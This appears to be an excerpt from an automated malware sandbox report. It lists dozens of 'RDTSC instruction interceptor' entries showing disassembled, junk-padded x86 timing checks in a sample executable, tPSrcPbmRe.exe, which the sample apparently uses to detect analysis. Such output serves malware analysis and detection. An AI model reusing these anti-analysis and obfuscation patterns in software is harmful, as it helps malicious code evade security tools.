                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F920 second address: D2F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F92A second address: D2F930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F930 second address: D2F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2FF6F second address: D2FF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D300EC second address: D30105 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9C81394BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30105 second address: D3010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D3010B second address: D3010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D3010F second address: D3011C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D3011C second address: D30122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B14 second address: D30B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F9C80FB5666h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B21 second address: D30B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F9C81394BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B2D second address: D30B43 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C80FB5666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9C80FB5666h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B43 second address: D30B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B47 second address: D30B5F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9C80FB5666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F9C80FB566Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B5F second address: D30B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B67 second address: D30B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5673h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D30B80 second address: D30BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9C81394C06h 0x0000000a jne 00007F9C81394BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F9C81394BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D3E539 second address: D3E548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB566Ah 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D3E548 second address: D3E54F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D51870 second address: D51878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D51878 second address: D51887 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9C81394BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D5482E second address: D5483D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9C80FB5666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D5483D second address: D54843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D5441B second address: D5442F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D69140 second address: D6916E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C09h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F9C81394BFAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6916E second address: D6917D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6917D second address: D69185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D69185 second address: D691A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5675h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68800 second address: D6881B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F9C81394C04h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6881B second address: D68823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68992 second address: D689B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jg 00007F9C81394BFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68C81 second address: D68C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68C85 second address: D68C8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68DCD second address: D68DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5674h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68DE9 second address: D68E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9C81394C07h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E09 second address: D68E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5676h 0x00000009 jnl 00007F9C80FB5666h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E29 second address: D68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E2D second address: D68E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E37 second address: D68E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E3D second address: D68E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E41 second address: D68E63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C81394C06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E63 second address: D68E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E69 second address: D68E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9C81394C02h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E83 second address: D68E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E87 second address: D68E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E8D second address: D68E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D68E92 second address: D68E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6BC39 second address: D6BC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6BC45 second address: D6BC5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6BDCF second address: D6BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6BE5C second address: D6BE90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C81394C06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6C158 second address: D6C167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F9C80FB566Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6C167 second address: D6C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F9C81394BF8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edx, esi 0x00000024 mov dword ptr [ebp+122D29FCh], eax 0x0000002a push dword ptr [ebp+122D34D8h] 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F9C81394BF8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a jo 00007F9C81394BFBh 0x00000050 mov edx, 16B2EC84h 0x00000055 mov dl, 1Fh 0x00000057 call 00007F9C81394BF9h 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6C1D2 second address: D6C1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6C1D6 second address: D6C20B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007F9C81394C08h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6C20B second address: D6C22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 jbe 00007F9C80FB566Ch 0x0000000f je 00007F9C80FB5666h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jno 00007F9C80FB5666h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D6EDBF second address: D6EDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE1 second address: D70DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE5 second address: D70DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DE9 second address: D70DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DEF second address: D70DF9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D70DF9 second address: D70E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F9C80FB5674h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007F9C80FB5675h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0394 second address: 50D03AF instructions: 0x00000000 rdtsc 0x00000002 call 00007F9C81394C02h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D03AF second address: 50D03F9 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 33B401E6h 0x00000011 pushfd 0x00000012 jmp 00007F9C80FB5677h 0x00000017 adc ecx, 303B3C6Eh 0x0000001d jmp 00007F9C80FB5679h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D03F9 second address: 50D0416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9C81394C07h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0416 second address: 50D0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0424 second address: 50D0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0428 second address: 50D0436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D0436 second address: 50D043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50D043C second address: 50D0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006A5 second address: 51006AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006AB second address: 51006FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F9C80FB5671h 0x0000000c and ax, 4B76h 0x00000011 jmp 00007F9C80FB5671h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9C80FB5678h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51006FA second address: 5100709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100709 second address: 510070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510070F second address: 5100747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F9C81394C06h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9C81394BFAh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100747 second address: 510074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510074B second address: 5100751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100751 second address: 5100787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9C80FB566Bh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9C80FB5675h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100787 second address: 510078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510078D second address: 5100791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100791 second address: 510079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dl, al 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510079F second address: 51007E8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9C80FB566Dh 0x00000008 sub al, FFFFFFB6h 0x0000000b jmp 00007F9C80FB5671h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dx, si 0x00000016 popad 0x00000017 mov dword ptr [esp], esi 0x0000001a jmp 00007F9C80FB566Ah 0x0000001f lea eax, dword ptr [ebp-04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9C80FB566Ah 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007E8 second address: 51007F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007F7 second address: 51007FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51007FD second address: 5100886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9C81394C04h 0x00000013 add cx, CB98h 0x00000018 jmp 00007F9C81394BFBh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov esi, 0C0121E5h 0x00000024 call 00007F9C81394C02h 0x00000029 pop ecx 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov edi, esi 0x00000030 popad 0x00000031 nop 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 pushfd 0x00000037 jmp 00007F9C81394BFEh 0x0000003c add esi, 31B3D058h 0x00000042 jmp 00007F9C81394BFBh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+08h] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100886 second address: 510088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 510088A second address: 5100890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
